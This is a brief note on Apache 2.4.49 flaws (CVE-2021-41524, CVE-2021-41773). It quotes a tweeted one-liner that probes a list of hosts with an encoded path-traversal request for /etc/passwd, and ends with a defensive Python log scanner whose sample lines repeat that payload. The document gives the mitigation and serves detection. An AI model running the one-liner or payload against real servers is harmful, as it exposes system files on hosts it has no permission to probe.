Apache 2.4.49 vulnerabilities
CVE-2021-41524 : null pointer dereference in h2 fuzzing (severity)
CVE - CVE-2021-41524
20210920 Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.
cve.mitre.org
CVE-2021-41773 : Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (severity: high)
CVE - CVE-2021-41773
20210929
cve.mitre.org
https://twitter.com/HackerGautam/status/1445412108863041544
Rohit Gautam 🤘🏴☠️ on Twitter
“CVE-2021-41773 POC 🔥👇 ✅ One Liner : cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0
twitter.com
I can't believe $host/cgi-bin/../../../../etc/passwd actually works.... Apache, what is going on,,,
Mitigation -> update to Apache 2.4.50
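To check whether a server already received requests of the shape quoted in the tweet, the following added example (not from the original post or from the Apache project) scans access-log lines for path segments that only become `..` after percent-decoding and reports the response status. The log lines are constructed samples, the function names are this example's own, and the repeated decoding goes slightly beyond the single-encoded form shown above.

```python
import re
from urllib.parse import unquote

# Request line and status inside an Apache common/combined log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [06/Oct/2021:10:00:02 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1024',
    '198.51.100.7 - - [06/Oct/2021:10:00:03 +0000] "GET /cgi-bin/.%2e/%2e%2e/etc/passwd HTTP/1.1" 403 199',
    '192.0.2.11 - - [06/Oct/2021:10:00:04 +0000] "GET /docs/v2.0/a%20b.html HTTP/1.1" 200 300',
]

def decode_fully(text, max_rounds=3):
    """Percent-decode repeatedly so nested encodings are unwrapped as well."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def find_traversal(lines):
    """Return one record per request containing an encoded '..' path segment."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = m["target"].split("?", 1)[0]  # ignore the query string
        for raw in path.split("/"):
            # A literal ".." is normalised by the server; a segment that is
            # ".." only after decoding is what ordinary clients never send.
            if raw != ".." and ".." in decode_fully(raw).split("/"):
                hits.append({
                    "client": line.split()[0],
                    "target": m["target"],
                    "status": int(m["status"]),
                    "served": m["status"].startswith("2"),  # 2xx: content was returned
                })
                break
    return hits

if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(hit)
```

A hit with `served` set to true means the server answered the traversal request with content, so that host should be treated as exposed rather than merely probed.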